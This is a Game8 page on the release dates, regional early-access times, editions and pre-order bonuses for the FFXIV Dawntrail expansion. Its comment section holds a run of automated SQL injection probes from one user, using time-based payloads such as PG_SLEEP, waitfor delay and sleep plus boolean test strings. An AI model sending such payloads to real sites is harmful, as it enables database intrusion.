Your Go-To Walkthrough Site for All Games and Apps - Game8

Dawntrail Release Date and Time

Image

FFXIV Dawntrail is the latest upcoming expansion of the critically acclaimed MMORPG developed by Square Enix. Read on to learn more about the release date, pre-order details, and where to get the game.

FFXIV Dawntrail Release Date and Time

Released July 2, 2024; Early Access Started on June 28, 2024 2 AM PDT

Image

FFXIV Dawntrail was released on July 2, 2024, for PC (Steam, Mac), PS4, PS5, and Xbox Series X|S. Dawntrail’s Early Access was available on June 28, 2024, 2 AM PDT as listed in Square Enix’s official blogpost. Please refer to the table below to see the release time for when Early Access was available:

Region Local Release Time
United States (EDT) Jun 28, 5:00 a.m.
United States (PDT) Jun 28, 2:00 a.m.
United Kingdom Jun 28, 10:00 a.m.
New Zealand Jun 28, 10:00 p.m.
Australian East Coast Jun 28, 8:00 p.m.
Australian West Coast Jun 28, 5:00 p.m.
Japan Jun 28, 6:00 p.m.
Philippines Jun 28, 5:00 p.m.
South Africa Jun 28, 11:00 a.m.
Brazil Jun 28, 6:00 a.m.

FFXIV Dawntrail Pre-Orders

Image

FFXIV Dawntrail can be purchased for PlayStation, Xbox, PC (Steam, Mac). Take note that you will need the base game to be able to play Dawntrail.

It is important to note that you should purchase the correct version of the expansion depending on the platform listed in your service account or the platform you are playing on.

Digital Storefront
Steam IconSteam SE IconOfficial SE Store
Playstation IconPlayStation Xbox IconXbox
$39.99


FFXIV Dawntrail DLC

Image

Those who pre-ordered the Standard Edition for $39.99 will be given the following in-game items immediately after registering their pre-order codes after purchasing the expansion:

 ● Wind-up Zidane Minion
 ● Azeyma’s Earrings (Increases earned EXP by 30% until level 90)
 ● Early Access to Dawntrail
 ● PlayStation Network Avatar (PlayStation users only)

FFXIV Dawntrail - Digital Collector’s Edition

Image

Additionally, there is a Digital Collector’s Edition available for $59.99 including the following items with the pre-order items:

 ● Ark Mount
 ● Wind-Up Garnet
 ● Chocobo Brush (Weapon for Pictomancer Job)


Bonuses Standard Edition ($39.99) Digital Collector’s Edition ($59.99)
Base Game
Wind-Up Zidane Minion
Azeyma’s Earrings
Increases EXP earned by 30% until level 90
Ark Mount
Wind-up Garnet Minion
Chocobo Brush

FFXIV Dawntrail - Collector’s Edition and Collector’s Box

Image
To top it off, a physical Collector’s Edition is available for purchase for $215.00. Those who purchase the Collector’s Edition will receive the digital items listed in the table above and the following goodies:
 ● Dawntrail Special Art Box
 ● Expertly Craft Viper Figure
 ● Adventurer’s Cloth Map
 ● The Unending Journey
 ● Adventurer’s Pen Case

The physical items are also available separately by ordering the Collector’s Box for $155.00. Please note that ordering the Collector’s Box does NOT include a copy of the expansion, Dawntrail, in-game bonus items, and the pre-order bonuses.

Is FFXIV Dawntrail on Xbox Game Pass?

Currently, there is no announcement if the game will be included in Xbox Game Pass

Is FFXIV Dawntrail on PS Plus?

Currently, there is no announcement if the game will be included in PS Plus.

FFXIV Dawntrail Trailers

Full Trailer

Benchmark Trailer

Job Actions Trailer

You may also like…

null Final Fantasy 14 Dawntrail and Viper Class Revealed by Naoki Yoshida
null FFXIV New Caster DPS Job Pictomancer, New Race, and More Revealed in Tokyo FanFest
null FF14 Dawntrail is Already Feeling the Heat with Massive Pre-Order Numbers
null FF14 Wants to Stress You Out More
null FF14 Dawntrail Brings New Mount Mountain Zu, a Collab from Mountain Dew

FFXIV Dawntrail Product Information

FFXIV Dawntrail Cover
Title FINAL FANTASY XIV: DAWNTRAIL
Release Date July 2, 2024
Developer Square Enix
Publisher Square Enix
Supported Platforms PC (Steam, Mac), PS4, PS5, Xbox Series X|S
Genre MMORPG
Number of Players 99 Online Players
ESRB Rating T
Official Website FFXIV Dawntrail Website

Comments

GnyBoezM29 days

@@fNz5u

GnyBoezM29 days

����%2527%2522\'\"

GnyBoezM29 days

'"

GnyBoezM29 days

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

GnyBoezM29 days

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

GnyBoezM29 days

J4SLen3G')) OR 334=(SELECT 334 FROM PG_SLEEP(15))--

GnyBoezM29 days

kUnOHOdc') OR 930=(SELECT 930 FROM PG_SLEEP(15))--

GnyBoezM29 days

SXcDudCF' OR 141=(SELECT 141 FROM PG_SLEEP(15))--

GnyBoezM29 days

-1)) OR 413=(SELECT 413 FROM PG_SLEEP(15))--

GnyBoezM29 days

-1) OR 161=(SELECT 161 FROM PG_SLEEP(15))--

GnyBoezM29 days

-1 OR 872=(SELECT 872 FROM PG_SLEEP(15))--

GnyBoezM29 days

UleFL2DB'; waitfor delay '0:0:15' --

GnyBoezM29 days

-1 waitfor delay '0:0:15' --

GnyBoezM29 days

-1); waitfor delay '0:0:15' --

GnyBoezM29 days

-1; waitfor delay '0:0:15' --

GnyBoezM29 days

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

GnyBoezM29 days

0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z

GnyBoezM29 days

0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z

GnyBoezM29 days

*if(now()=sysdate(),sleep(15),0)

GnyBoezM29 days

-1" OR 2+596-596-1=0+0+0+1 --

GnyBoezM29 days

-1' OR 2+57-57-1=0+0+0+1 or 'SkF74cBD'='

GnyBoezM29 days

-1' OR 2+623-623-1=0+0+0+1 --

GnyBoezM29 days

-1 OR 2+35-35-1=0+0+0+1

GnyBoezM29 days

-1 OR 2+591-591-1=0+0+0+1 --

GnyBoezM29 days

yvAlOneP

Game8 Ads Createive